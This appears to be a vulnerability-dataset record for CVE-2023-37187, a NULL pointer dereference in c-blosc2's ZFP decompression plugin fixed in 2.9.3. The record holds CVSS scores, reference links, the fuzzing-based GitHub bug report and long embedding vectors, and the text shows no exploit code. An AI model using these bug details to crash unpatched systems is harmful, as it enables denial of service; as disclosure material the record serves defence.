-0.0011266102083027363, 0.003991940524429083, -0.012077991850674152, -0.03044675476849079, -0.007075294852256775, 0.009684287011623383, 0.030738670378923416, -0.015982357785105705, 0.01666835881769657, 0.01704784855246544, -0.01744193397462368, -0.011494161561131477, -0.008502030745148659, -0.01786521077156067, 0.006597283761948347, 0.01966048963367939, 0.02433113195002079, 0.004864037036895752, 0.007940093986690044, 0.019222615286707878, 0.010895734652876854, -0.019208019599318504, 0.005280016455799341, 0.014493590220808983, -0.00909315887838602, -0.01498984545469284, -0.005681399721652269, -0.0014039296656847, -0.0046049621887505054, -0.0011959400726482272, -0.008947201073169708, 0.011275224387645721, 0.0021273321472108364, 0.015938570722937584, -0.008180923759937286, -0.017237592488527298, -0.002163821365684271, -0.005998857319355011, -0.002782316878437996, 0.01856580749154091, 0.021981215104460716, -0.004218174610286951, -0.021499555557966232, -0.012990226969122887, 0.019397765398025513, 0.012296928092837334, -0.009487244300544262, -0.003867876483127475, 0.012763991951942444, -0.02113466151058674, -0.000020981406123610213, 0.008166328072547913, 0.023966237902641296, 0.036956463009119034, 0.021703895181417465, -0.02717730589210987, -0.005947772413492203, -0.02355755679309368, -0.004506440833210945, 0.005316505674272776, 0.0014303844654932618, -0.0006184953381307423, -0.01142848003655672, -0.030972203239798546, 0.01409220602363348, 0.00764817837625742, -0.019018275663256645, -0.002238624729216099, -0.016361847519874573, -0.008268497884273529, -0.02020053192973137, 0.017150018364191055, -0.007451135665178299, 0.003408110002055764, 0.02020053192973137, -0.04574311152100563, 0.01272750273346901, 0.003780301893129945, 0.0005126760806888342, 0.00437143025919795, 0.002461210126057267, 0.004455355927348137, -0.008436349220573902, -0.011859054677188396, 0.006451325956732035, 0.0009468999342061579, -0.019368574023246765, 0.009465350769460201, 0.010830054059624672, -0.010545436292886734, 0.015223377384245396, 0.009837542660534382, 0.003816791344434023, 0.022783981636166573, 0.017295975238084793, 0.004842143505811691, 0.003816791344434023, -0.00784522108733654, -0.009246413595974445, -0.007575199473649263, 0.014573866501450539, 0.00399923836812377, -0.017412742599844933, -0.035175781697034836, 0.0112314373254776, 0.013026716187596321, -0.00035554359783418477, 0.007662774063646793, 0.013493780046701431, -0.022433683276176453, -0.03313237428665161, -0.01919342391192913, -0.0163472518324852, 0.003395338775590062, -0.014026525430381298, 0.009479946456849575, -0.012844269163906574, -0.004002887289971113, 0.00383503595367074, -0.015106611885130405, -0.009633202105760574, -0.0008994637173600495, 0.016215888783335686, -0.004586717579513788, -0.012734800577163696, -0.008633391931653023, 0.006068187300115824, 0.01704784855246544, -0.015135803259909153, -0.0028808382339775562, 0.026111815124750137, -0.007881710305809975, -0.007111784070730209, -0.001335512031801045, -0.01512120757251978, 0.015004441142082214, 0.000952373375184834, 0.014435206539928913, -0.0055390908382833, 0.00846554059535265, 0.007203007582575083, 0.00570329325273633, 0.003539471887052059, 0.02491496317088604, 0.002712986897677183, -0.00804226379841566, -0.0065133580937981606, 0.03456275910139084, -0.007367209997028112, 0.02017134055495262, 0.023338619619607925, 0.014931462705135345, 0.009217222221195698, 0.012187459506094456, 0.008005774579942226, 0.013749206438660622, -0.013106992468237877, -0.005028239451348782, 0.02344079129397869, 0.00605359161272645, 0.0015024510212242603, 0.015894783660769463, 0.010224330238997936, 0.012296928092837334, 0.0052909632213413715, 0.010983309708535671, 0.0008232921245507896, -0.016201293095946312, 0.006166708655655384, 0.009122350253164768, -0.005181494634598494, -0.0074803270399570465, -0.03590556979179382, 0.011537948623299599, 0.021864449605345726, -0.005006345920264721, -0.011997714638710022, 0.02285696007311344, 0.012238545343279839, -0.011530650779604912, 0.004462653771042824, 0.0036653601564466953, -0.02028810605406761, 0.02171849086880684, -0.0023134280927479267, 0.017573295161128044, 0.009523733519017696, -0.0012743923580273986, -0.006973124574869871, -0.009990797378122807, 0.00014173852105159312, -0.014603057876229286, 0.0036106260959059, -0.026403730735182762, -0.014646844938397408, 0.0009076738497242332, 0.00443711131811142, -0.008283093571662903, -0.006918390281498432, -0.007713859435170889, 0.009348584339022636, 0.005911282729357481, 0.014055716805160046, 0.005061079747974873, -0.007662774063646793, 0.008509328588843346, 0.006031698081642389, -0.004053972195833921, 0.009020179510116577, 0.036226674914360046, -0.01446439791470766, 0.015106611885130405, 0.007728455122560263, 0.012165565975010395, -0.0186825729906559, -0.022214746102690697, -0.008326881565153599, 0.004718079697340727, -0.011457671411335468, 0.008297689259052277, 0.00028621373348869383, -0.014654142782092094, -0.007057050243020058, 0.009465350769460201, 0.013771099969744682, 0.002461210126057267, 0.006389293819665909, -0.025951260700821877, 0.023192662745714188, 0.013377014547586441, 0.005484357010573149, 0.008735562674701214, 0.0034117589239031076, -0.018317678943276405, -0.0007484888192266226, 0.002079895930364728, 0.0052435267716646194, -0.00047983560943976045, -0.0036963762249797583, -0.004747271072119474, 0.0003747005248442292, -0.011151161044836044, -0.010406777262687683, -0.022783981636166573, 0.0014513658825308084, 0.007947391830384731, 0.010224330238997936, -0.0012762168189510703, 0.011391990818083286, -0.002663726219907403, 0.018784742802381516, -0.029206115752458572, -0.025469601154327393, 0.008954498916864395, -0.012158268131315708, -0.012428290210664272, 0.002417422831058502, 0.00038131422479636967, -0.0004116460622753948, 0.003466492984443903, -0.0029355722945183516, 0.02627236768603325, -0.008560413494706154, -0.019879424944519997, 0.0058492510579526424, 0.018113337457180023, 0.03266531229019165, 0.01409220602363348, 0.0020032681059092283, 0.0015435016248375177, 0.0043422384187579155, -0.006856358144432306, -0.004619557876139879, -0.01825929619371891, -0.006706751883029938, 0.018273891881108284, -0.005057430826127529, 0.004345887806266546, 0.00526542030274868, 0.00006408451008610427, 0.0007302441517822444, 0.015748824924230576, -0.004907824564725161, 0.007874412462115288, -0.012873460538685322, 0.0015316426288336515, -0.0035887325648218393, -0.021105468273162842, -0.008086050860583782, -0.018127935007214546, 0.012121778912842274, 0.0001025124074658379, 0.011866353452205658, -0.0034445994533598423, 0.0072978800162673, 0.025790708139538765, -0.002787790261209011, -0.018594998866319656, 0.010669500567018986, 0.009355882182717323, -0.008429051376879215, 0.01865338161587715, 0.0028479977045208216, -0.0071519226767122746, 0.016245080158114433, -0.0018919754074886441, 0.010457862168550491, -0.004619557876139879, 0.015850994735956192, -0.013333226554095745, -0.007005964871495962, 0.012763991951942444, -0.0039809937588870525, 0.0036763071548193693, -0.0073599121533334255, 0.0071044862270355225, 0.003271274734288454, 0.00014766804815735668, 0.0038569297175854445, -0.0077430508099496365, 0.02608262374997139, 0.03021322377026081, 0.004167089704424143, -0.010487053543329239, -0.028636882081627846, 0.009764563292264938, 0.01658078283071518, -0.02965858392417431, 0.002813332714140415, -0.005137707572430372, 0.012136374600231647, 0.008713669143617153, 0.00284617324359715, -0.018419848755002022, 0.0017314220312982798, -0.004944313783198595, -0.0005487093585543334, 0.024155983701348305, 0.022025002166628838, -0.015529888682067394, -0.0020598266273736954, 0.008647987619042397, -0.003422705689445138, -0.018638785928487778, 0.024243557825684547, 0.0026527794543653727, 0.0004066287656314671, -0.0174857210367918, -0.01935397833585739, -0.00739640137180686, 0.0005760763888247311, 0.0012461129808798432, -0.0029355722945183516, -0.0041889832355082035, -0.0039007170125842094, -0.007013262715190649, -0.01300482265651226, -0.01078626699745655, 0.005017292685806751, -0.0036635356955230236, 0.0027038645930588245, -0.04536362364888191, 0.014865782111883163, 0.011596331372857094, 0.00747302919626236, 0.016595378518104553, -0.017646273598074913, -0.006641070824116468, -0.0049479627050459385, -0.022988323122262955, 0.038474421948194504, -0.00020320035400800407, 0.000009264887012250256, -0.008669881150126457, 0.0012926369672641158, -0.006557145155966282, 0.00740734813734889, -0.011917438358068466, -0.0026016943156719208, 0.019105849787592888, -0.007031507324427366, 0.00723219895735383, -0.0017332464922219515, -0.0003051426028832793, 0.00764817837625742, 0.026097219437360764, 0.0018345046555623412, -0.0003455090045463294, -0.006111974362283945, -0.005345697049051523, 0.016245080158114433, 0.00630536861717701, -0.017004061490297318, 0.005787218920886517, -0.017339762300252914, -0.00004891860226052813, -0.011450373567640781, 0.0018016641261056066, -0.011304416693747044, 0.006863655988126993, 0.019485339522361755, -0.011260628700256348, -0.005104867275804281, -0.0015188712859526277, 0.0030997744761407375, 0.01222394872456789, 0.0037073229905217886, -0.02573232538998127, 0.014208972454071045, -0.006498762406408787, 0.022433683276176453, -0.022287726402282715, 0.004316695965826511, -0.01783601939678192, -0.02549879252910614, 0.012245843186974525, 0.013807589188218117, -0.025717729702591896, 0.0008251165854744613, 0.005805463530123234, -0.014427908696234226, 0.025133898481726646, -0.0035358229652047157, 0.0169310811907053, -0.025600964203476906, -0.02545500546693802, 0.015500697307288647, 0.018434444442391396, -0.00445900484919548, 0.020798958837985992, 0.012639928609132767, -0.02020053192973137, -0.018040359020233154, -0.0056923464871943, 0.013836780562996864, -0.002568853786215186, -0.020331893116235733, -0.008779349736869335, -0.04282395914196968, -0.020215127617120743, -0.004999048076570034, -0.00392261054366827, -0.01043596863746643, 0.02090112864971161, -0.005447867326438427, 0.01274939626455307, -0.016069931909441948, -0.0015407649334520102, 0.009115052409470081, 0.021426575258374214, -0.010465160012245178, 0.0032621524296700954, 0.015413123182952404, -0.014223568141460419, -0.017252188175916672, 0.05359563231468201, 0.00869907345622778, 0.01015864871442318, 0.000808696320746094, -0.004426164086908102, 0.0035303495824337006, 0.0033807428553700447, -0.013946249149739742, -0.007013262715190649, -0.004207227844744921, -0.0071373265236616135, 0.00014903639385011047, 0.007816029712557793, -0.00953832920640707, -0.0072249011136591434, 0.00821741297841072, -0.00006807554018450901, 0.0014705228386446834, -0.002185715129598975, -0.023572152480483055, 0.0009268307476304471, -0.01023892592638731, 0.020229723304510117, -0.01900367997586727, -0.008005774579942226, 0.00973537191748619, 0.0033606737852096558, -0.024535473436117172, 0.0035759613383561373, -0.00613021943718195, 0.02316347137093544, -0.014274653047323227, -0.013880567625164986, 0.008078753016889095, 0.0024593856651335955, 0.00605359161272645, 0.024039216339588165, 0.016945676878094673, -0.020930320024490356, 0.000852027500513941, 0.004984451923519373, 0.0019576563499867916, -0.005641261115670204, 0.013814887031912804, -0.016989463940262794, 0.012785885483026505, 0.00040708488086238503, 0.03935017064213753, 0.025834495201706886, 0.022331513464450836, 0.0010417724261060357, 0.0042218235321342945, -0.0035139292012900114, 0.01615750603377819, 0.013690822757780552, -0.013632440008223057, 0.008078753016889095, -0.008180923759937286, -0.018011167645454407, -0.010129457339644432, 0.0011101900599896908, 0.00907126534730196, -0.02519228123128414, -0.013814887031912804, -0.014179781079292297, -0.00571424001827836, 0.013851376250386238, 0.00951643567532301, 0.0029811840504407883, 0.03978804126381874, -0.010895734652876854, -0.008261200040578842, -0.02176227793097496, -0.01713542267680168, 0.0032803970389068127, -0.03164360672235489, -0.009282903745770454, -0.006626475136727095, 0.0030596363358199596, -0.0016712145879864693, -0.008005774579942226, -0.018901510164141655, 0.0056193675845861435, 0.002526890952140093, 0.014865782111883163, -0.0030742320232093334, 0.0016183048719540238, 0.0023845823016017675, -0.004926069173961878, 0.010618415661156178, 0.020580021664500237, 0.006480517331510782, -0.016872698441147804, -0.01907665841281414, 0.013698120601475239, 0.0028917849995195866, 0.010603819973766804, -0.0028115082532167435, 0.01131171453744173, 0.012056098319590092, 0.01382218487560749, 0.0036434666253626347, -0.01798197627067566, -0.0048056538216769695, 0.00020764749206136912, -0.010114861652255058, 0.018478231504559517, -0.01947074383497238, -0.023426195606589317, 0.01056733075529337, 0.014821994118392467, -0.004999048076570034, -0.011085479520261288, -0.01068409625440836, 0.02017134055495262, 0.002504997421056032, 0.004575770813971758, -0.011610927060246468, 0.013128885999321938, 0.015077420510351658, -0.019952403381466866, -0.0012807779712602496, 0.0026235878467559814, -0.0022897098679095507, -0.015325548127293587, -0.00866258330643177, 0.013012120500206947, 0.02577611245214939, 0.011866353452205658, -0.011282522231340408, 0.00001526568303233944, -0.0008807628764770925, 0.023761898279190063, 0.01243558805435896, 0.015252569690346718, 0.006323613226413727, -0.014603057876229286, 0.01056733075529337, 0.016522400081157684, 0.008137136697769165, 0.019412361085414886, 0.019791850820183754, -0.006881901063024998, 0.0033770939335227013, -0.014033823274075985, 0.007414645981043577, 0.006914741359651089, -0.003065109718590975, -0.008013072423636913, -0.016288869082927704, 0.0052033886313438416, 0.0169310811907053, 0.007516816258430481, -0.008976392447948456, 0.0011922911508008838, 0.013544865883886814, 0.0003840509452857077, 0.02122223563492298, -0.015310952439904213, 0.008304987102746964, 0.002439316362142563, 0.021003298461437225, 0.009115052409470081, 0.00015713248285464942, 0.007290582172572613, -0.0218790452927351, 0.008772051893174648, -0.007903603836894035, 0.01155984215438366, -0.0021145606879144907, -0.025440409779548645, 0.0003968222299590707, 0.0033679716289043427, -0.012785885483026505, 0.01970427669584751, 0.002599869854748249, 0.016099123284220695, 0.003988291602581739, 0.015836399048566818, 0.007991178892552853, 0.008954498916864395, 0.012778587639331818, -0.000865254900418222, 0.01512120757251978, 0.038912296295166016, 0.003466492984443903, 0.004623206797987223, -0.012508566491305828, 0.012515864335000515, 0.0015891133807599545, 0.0064330813474953175, -0.006079134065657854, 0.00499174976721406, 0.006779730785638094, -0.0009605834493413568, 0.032285820692777634, 0.004787409212440252, -0.006268878933042288, 0.020798958837985992, -0.012143672443926334, 0.012793183326721191, -0.009830244816839695, 0.00023991780471988022, -0.007772242184728384 ]
CVE-2023-37187
2023-12-25T07:15:09.183000
C-blosc2 before 2.9.3 was discovered to contain a NULL pointer dereference via the zfp/blosc2-zfp.c zfp_acc_decompress. function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch" ], "url": "https://github.com/Blosc/c-blosc2/commit/425e8a9a59d49378d57e2116b6c9b0190a5986f5" }, { "source": "[email protected]", "tags": [ "Release Notes" ], "url": "https://github.com/Blosc/c-blosc2/compare/v2.9.2...v2.9.3" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/Blosc/c-blosc2/issues/520" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:c-blosc2_project:c-blosc2:*:*:*:*:*:*:*:*", "matchCriteriaId": "075116F3-2BB5-414B-82A9-D132E60D4769", "versionEndExcluding": "2.9.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/Blosc/c-blosc2/issues/520
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "Blosc", "c-blosc2" ]
**Describe the bug** Null Pointer Dereferencing at line **152** in [plugins/codecs/zfp/blosc2-zfp.c](https://github.com/Blosc/c-blosc2/blob/86fc0f66aa6dd079dbf79d775dc9dc1462830ffd/plugins/codecs/zfp/blosc2-zfp.c#LL152C19-L152C19). This is caused due to using a pointer to a chunk which does not exist. This bug is in function `zfp_acc_decompress`. **To Reproduce** Run the fuzzing harness `fuzz_decompress_chunk` with the attached input (in Zip File) [null-ptr-2.zip](https://github.com/Blosc/c-blosc2/files/11807486/null-ptr-2.zip) **Expected behavior** Check whether the chunk is a correct pointer at line 151. **Logs** If applicable, add logs to help explain your problem. **System information:** - OS: Ubuntu 20.04 - Compiler: clang-11 - Version: Latest commit on `main` branch **Additional context** This bug has been found by fuzzing.
Null Pointer Dereferencing bug in plugins/codecs/zfp/blosc2-zfp.c
https://api.github.com/repos/Blosc/c-blosc2/issues/520/comments
0
2023-06-20T21:11:25
2023-06-21T09:17:12Z
https://github.com/Blosc/c-blosc2/issues/520
1,766,179,764
520
true
This is a GitHub Issue repo:c-blosc2 owner:Blosc Title : Null Pointer Dereferencing bug in plugins/codecs/zfp/blosc2-zfp.c Issue date: --- start body --- **Describe the bug** Null Pointer Dereferencing at line **152** in [plugins/codecs/zfp/blosc2-zfp.c](https://github.com/Blosc/c-blosc2/blob/86fc0f66aa6dd079dbf79d775dc9dc1462830ffd/plugins/codecs/zfp/blosc2-zfp.c#LL152C19-L152C19). This is caused due to using a pointer to a chunk which does not exist. This bug is in function `zfp_acc_decompress`. **To Reproduce** Run the fuzzing harness `fuzz_decompress_chunk` with the attached input (in Zip File) [null-ptr-2.zip](https://github.com/Blosc/c-blosc2/files/11807486/null-ptr-2.zip) **Expected behavior** Check whether the chunk is a correct pointer at line 151. **Logs** If applicable, add logs to help explain your problem. **System information:** - OS: Ubuntu 20.04 - Compiler: clang-11 - Version: Latest commit on `main` branch **Additional context** This bug has been found by fuzzing. --- end body ---
1,041
[ -0.021273842081427574, 0.029280127957463264, 0.0009276189375668764, -0.002578494604676962, 0.0265754833817482, -0.014344032853841782, -0.04141738638281822, 0.04453916475176811, -0.00103358447086066, 0.012433289550244808, -0.022632893174886703, 0.018959419801831245, 0.009089487604796886, 0.02440907619893551, -0.016510440036654472, 0.001291770371608436, -0.026158349588513374, 0.022982746362686157, -0.027773061767220497, -0.023709367960691452, 0.02175825648009777, 0.00538574019446969, -0.03269793465733528, 0.012648584321141243, -0.03059880994260311, 0.013583771884441376, -0.014424768276512623, 0.0060383533127605915, 0.0078649977222085, 0.003308479441329837, 0.026521658524870872, 0.015783818438649178, 0.013503036461770535, 0.006603503134101629, 0.07562238723039627, -0.007461319211870432, 0.029118655249476433, 0.04459298774600029, 0.035765890032052994, -0.006287288386374712, 0.0019124256214126945, -0.046126965433359146, -0.03662706911563873, 0.03000674769282341, -0.014424768276512623, 0.01751963421702385, 0.026629306375980377, 0.009728644974529743, -0.03651942312717438, 0.005375648383051157, 0.010038131847977638, -0.03202513977885246, -0.009614269249141216, -0.05856025591492653, 0.04986771568655968, -0.0103678023442626, 0.0336129404604435, 0.04515813663601875, 0.008450331166386604, 0.05716083571314812, -0.03579280152916908, 0.016362423077225685, -0.02409959025681019, 0.02200046367943287, 0.001295975293032825, 0.04978698119521141, 0.0035961002577096224, 0.000012332422556937672, 0.0014616515254601836, -0.009580629877746105, -0.03611574321985245, -0.016671910881996155, -0.004416912794113159, 0.031190870329737663, 0.03081410378217697, -0.04965241998434067, 0.029091743752360344, 0.04496975243091583, -0.0094729820266366, -0.01659117452800274, -0.026467835530638695, -0.0025162608362734318, -0.02200046367943287, 0.0037508434616029263, 0.01647007092833519, 0.02450326830148697, -0.03132542967796326, -0.05683789402246475, -0.02790762111544609, -0.024826209992170334, -0.028230564668774605, 0.03923752158880234, -0.0031318701803684235, 0.003915678709745407, 0.001198419719003141, 0.014761166647076607, -0.03339764475822449, -0.02163715288043022, -0.041121356189250946, -0.02305002696812153, -0.04370489716529846, -0.014101825654506683, -0.008833825588226318, 0.02695224992930889, -0.0003263065591454506, 0.012884063646197319, 0.004241985268890858, -0.019672585651278496, 0.023346057161688805, 0.11776639521121979, 0.006549679208546877, -0.027799973264336586, -0.0200224407017231, -0.005516935605555773, 0.005769234616309404, 0.015743451192975044, 0.009775741025805473, 0.0027147361543029547, -0.019363099709153175, -0.02814982831478119, 0.0030511345248669386, -0.02147568203508854, -0.0033656673040241003, 0.022269582375884056, -0.025768127292394638, 0.007979372516274452, 0.00502242986112833, -0.015205212868750095, -0.02858041785657406, -0.01024669874459505, -0.028499683365225792, -0.053016405552625656, -0.016981396824121475, -0.04278989136219025, -0.01675264537334442, -0.027369383722543716, -0.023009657859802246, 0.03065263293683529, -0.0004144009144511074, 0.007037457078695297, -0.04631534963846207, -0.015676170587539673, 0.04542725533246994, -0.025889230892062187, -0.02771923877298832, -0.015904922038316727, -0.02450326830148697, -0.02008971944451332, -0.022350316867232323, -0.01680647023022175, 0.004453916568309069, -0.01551469974219799, 0.03415117785334587, 0.01856919750571251, 0.05045977607369423, -0.008672353811562061, 0.017573459073901176, 0.04585784673690796, -0.0029451691079884768, -0.013032078742980957, 0.02743666246533394, -0.007286392152309418, 0.020264646038413048, -0.021193107590079308, -0.011134791187942028, 0.0002541911380831152, -0.03372058644890785, 0.02936086244881153, -0.026373643428087234, 0.02855350635945797, -0.0005769234849140048, 0.02342679351568222, -0.0008178689167834818, 0.026467835530638695, -0.06657999753952026, -0.01438440103083849, -0.0075756944715976715, 0.03810722380876541, -0.0017946860752999783, -0.019026700407266617, 0.00688271364197135, 0.0189459640532732, 0.020654868334531784, -0.012406377121806145, 0.006549679208546877, -0.03458176925778389, 0.004844138864427805, -0.020412662997841835, 0.020479941740632057, -0.054065968841314316, -0.00831577181816101, -0.014330577105283737, -0.018434638157486916, -0.023709367960691452, 0.0017425443511456251, 0.009748829528689384, -0.012426561675965786, -0.009244231507182121, 0.006539587397128344, 0.021125826984643936, 0.006051809526979923, -0.015797274187207222, -0.03401661664247513, 0.0015970519743859768, -0.03912987560033798, 0.009681549854576588, -0.003986322320997715, 0.031002487987279892, 0.0012656993931159377, -0.011646117083728313, 0.03910296410322189, -0.05662259832024574, 0.01990133710205555, 0.0051704454235732555, -0.019026700407266617, 0.00004042038563056849, -0.0300336591899395, 0.008692537434399128, -0.04712270572781563, 0.00595761789008975, 0.004729763139039278, 0.003160464111715555, 0.03590045124292374, -0.03315543755888939, -0.04435078054666519, 0.0041175177320837975, 0.00891456101089716, 0.010798392817378044, -0.051132574677467346, 0.004686031490564346, 0.019955160096287727, 0.005180537234991789, 0.001978023210540414, 0.0006622846121899784, 0.00008530855848221108, -0.012292002327740192, -0.012258362025022507, -0.013899986632168293, -0.01795022562146187, -0.016833381727337837, 0.03151381388306618, 0.04206326976418495, -0.019551482051610947, -0.010556185618042946, -0.014007634483277798, 0.032374992966651917, -0.028795713558793068, -0.0056313113309443, -0.021731344982981682, 0.014828446321189404, 0.001708063529804349, -0.012298730202019215, 0.02111237123608589, -0.011060783639550209, 0.03022204339504242, -0.015608890913426876, 0.0017980501288548112, -0.008988568559288979, -0.03164837136864662, -0.02054722234606743, 0.010347618721425533, -0.016456615179777145, -0.013832706958055496, -0.005237725097686052, 0.012197810225188732, -0.011525013484060764, -0.022242670878767967, -0.0038719470612704754, 0.003104958450421691, -0.01930927485227585, 0.023615175858139992, 0.00417134165763855, 0.013173365965485573, -0.031756021082401276, 0.009257687255740166, -0.0057524144649505615, 0.004733127076178789, 0.017573459073901176, -0.017721474170684814, 0.020668325945734978, 0.011773948557674885, 0.01324064563959837, -0.02190627157688141, 0.037003837525844574, 0.00818794034421444, -0.01597220078110695, 0.051563166081905365, -0.019766777753829956, -0.020251190289855003, -0.003022540593519807, -0.013233917765319347, 0.011814315803349018, -0.04685358703136444, 0.003076364519074559, 0.011659572832286358, 0.0038483990356326103, 0.010610009543597698, 0.015003373846411705, -0.040529292076826096, 0.007683342322707176, -0.020883619785308838, -0.004497648216784, -0.0031385982874780893, 0.0006824684678576887, -0.02636018767952919, -0.004679303616285324, 0.006990361027419567, -0.03619648143649101, -0.021892815828323364, 0.008571433834731579, 0.045965492725372314, -0.026010332629084587, -0.031163958832621574, -0.06431939452886581, -0.015393596142530441, -0.020197367295622826, 0.02197355218231678, -0.021744800731539726, 0.011161702685058117, -0.007387311663478613, -0.03041042573750019, -0.0018703758250921965, -0.027880709618330002, 0.00817448366433382, 0.019457289949059486, -0.05393141135573387, -0.015272492542862892, 0.06544969230890274, -0.054658032953739166, -0.0009175269515253603, -0.007461319211870432, -0.007844813168048859, -0.01446513645350933, -0.045104313641786575, -0.0015095883281901479, -0.010354346595704556, -0.06588028371334076, 0.019820600748062134, -0.0005609445506706834, 0.01001122035086155, -0.0137654272839427, -0.01930927485227585, 0.008463786914944649, 0.00155836611520499, -0.012742775492370129, -0.03869928419589996, 0.018286623060703278, -0.032778672873973846, 0.020587589591741562, -0.028284387663006783, 0.000827960844617337, 0.010340890847146511, -0.01121552661061287, 0.017694562673568726, 0.02126038633286953, -0.005008974112570286, -0.002095762873068452, -0.006704422645270824, 0.00482059083878994, 0.01992824859917164, 0.027154088020324707, -0.006640506908297539, -0.0007051753927953541, 0.0173985306173563, -0.0076564303599298, 0.010758024640381336, 0.01254766434431076, -0.03977576270699501, -0.019887881353497505, -0.022202301770448685, -0.04023326188325882, 0.05140169337391853, -0.048037707805633545, -0.008551250211894512, -0.012608216144144535, -0.008605074137449265, 0.013980722054839134, 0.039264436811208725, -0.006310836412012577, 0.007891909219324589, -0.024005398154258728, -0.010710928589105606, 0.0229962021112442, -0.035523682832717896, 0.03215969726443291, -0.004928238224238157, -0.043839454650878906, 0.05193993076682091, -0.023897750303149223, -0.04311283305287361, -0.006226736586540937, 0.0232384093105793, -0.009136583656072617, -0.05527700483798981, 0.01680647023022175, 0.00826867576688528, -0.015770362690091133, -0.0007358717848546803, 0.00869926530867815, -0.015447420068085194, 0.012742775492370129, 0.020008983090519905, -0.015070653520524502, -0.005981165450066328, -0.012399649247527122, 0.049679335206747055, 0.01384616270661354, 0.000001287775603486807, 0.0072594801895320415, 0.0336129404604435, 0.01254766434431076, -0.02771923877298832, -0.020897075533866882, -0.0061325449496507645, 0.04941021278500557, 0.035523682832717896, -0.012554393149912357, -0.008880920708179474, -0.05710701271891594, 0.022727083414793015, 0.018246255815029144, -0.006146001163870096, -0.0011605748441070318, 0.00346490484662354, 0.0148957259953022, -0.0033505293540656567, -0.04631534963846207, 0.02475893124938011, 0.04055620729923248, -0.010704200714826584, 0.0034312650095671415, 0.038645461201667786, -0.02218884602189064, 0.022108111530542374, -0.00968827772885561, -0.06227409467101097, 0.017438899725675583, -0.021489137783646584, -0.014626607298851013, -0.003205877961590886, -0.007313303649425507, 0.04058311879634857, -0.03183675557374954, -0.018004048615694046, -0.005291548557579517, -0.037784282118082047, -0.03665398433804512, -0.0038618550170212984, 0.006990361027419567, -0.024853123351931572, -0.010758024640381336, 0.009150039404630661, -0.028688065707683563, -0.010697472840547562, -0.012002699077129364, -0.008113931864500046, -0.01928236335515976, 0.004013234283775091, 0.04106752946972847, -0.002676050178706646, -0.029118655249476433, 0.021704431623220444, 0.011013687588274479, -0.018838316202163696, 0.025673935189843178, 0.003461540676653385, 0.025485550984740257, -0.035523682832717896, -0.0002766877878457308, 0.006879349704831839, -0.030679544433951378, 0.027988357469439507, 0.032590288668870926, 0.006408391986042261, 0.0333707332611084, 0.034904710948467255, -0.027329016476869583, -0.0051704454235732555, 0.011154974810779095, -0.041982535272836685, -0.0002390532026765868, -0.037003837525844574, -0.019174715504050255, -0.015528155490756035, 0.0336129404604435, 0.0017862761160358787, -0.002756785834208131, 0.02101817913353443, 0.0007026523817330599, 0.021717889234423637, 0.026252539828419685, -0.00902220793068409, -0.02747703157365322, -0.04394710436463356, -0.01121552661061287, 0.0070240008644759655, 0.0005336121539585292, -0.011504828929901123, 0.034258823841810226, 0.02395157516002655, 0.021220019087195396, -0.03065263293683529, 0.012796599417924881, -0.002909847302362323, -0.00859161838889122, -0.0328863188624382, -0.0350392684340477, 0.01873067021369934, -0.00442027673125267, -0.017452355474233627, -0.015232125297188759, -0.017815666273236275, 0.009129855781793594, -0.05285493656992912, 0.0010697472607716918, -0.031190870329737663, -0.01254766434431076, -0.0034379928838461637, 0.029226303100585938, 0.0014557646354660392, -0.02082979679107666, 0.003343801246955991, 0.0035120004322379827, 0.05169772356748581, 0.029118655249476433, 0.02147568203508854, -0.0033404373098164797, -0.009089487604796886, 0.008665625937283039, -0.00660686707124114, 0.0002672265691217035, 0.018999788910150528, -0.031190870329737663, 0.018824860453605652, 0.013980722054839134, -0.009533533826470375, 0.023615175858139992, 0.019416922703385353, 0.017169781029224396, -0.018152063712477684, 0.012480384670197964, 0.031002487987279892, -0.022108111530542374, -0.004790314938873053, -0.04827991500496864, 0.04650373011827469, 0.007299847900867462, 0.01813860796391964, -0.006943265441805124, -0.007528598885983229, -0.012305458076298237, -0.004110789857804775, 0.024005398154258728, 0.020627956837415695, -0.009156767278909683, 0.013132997788488865, 0.007649702485650778, 0.013018622994422913, -0.012635128572583199, 0.010461993515491486, 0.007716982159763575, 0.009769013151526451, 0.014303664676845074, -0.037192221730947495, -0.0011488009477034211, 0.004635571502149105, -0.018771037459373474, 0.007232568226754665, -0.04327430576086044, 0.010899311862885952, 0.03210587427020073, 0.039937231689691544, 0.020937444642186165, -0.015057197771966457, -0.0011765537783503532, 0.02660239487886429, -0.02469165064394474, -0.02395157516002655, -0.00785154104232788, -0.012924430891871452, -0.004951786249876022, -0.019524570554494858, -0.002924985019490123, 0.039668112993240356, 0.02107200399041176, 0.003318571485579014, -0.0008746361709199846, -0.008557978086173534, 0.001386802876368165, -0.006021533627063036, -0.02719445712864399, 0.02771923877298832, -0.027665413916110992, 0.0017072224291041493, 0.005789418704807758, -0.0016609677113592625, 0.015070653520524502, -0.006088813301175833, -0.013529948890209198, -0.0020974448416382074, -0.004625479690730572, -0.0024287973064929247, -0.00299731083214283, -0.020318470895290375, -0.019511114805936813, 0.015891466289758682, -0.0021714523900300264, -0.008975112810730934, -0.0343126505613327, 0.03517382964491844, 0.0004818908928427845, 0.018098240718245506, 0.04827991500496864, -0.020843252539634705, -0.00482059083878994, 0.029872188344597816, 0.018986333161592484, -0.0032714756671339273, 0.0008531907224096358, 0.02666967548429966, 0.03630412742495537, -0.03689618781208992, 0.024920402094721794, 0.0009301418904215097, 0.02147568203508854, 0.014599695801734924, 0.002432161243632436, 0.007272935938090086, -0.004033418372273445, -0.01835390366613865, -0.04039473459124565, 0.03557750582695007, 0.004184797406196594, -0.032617200165987015, 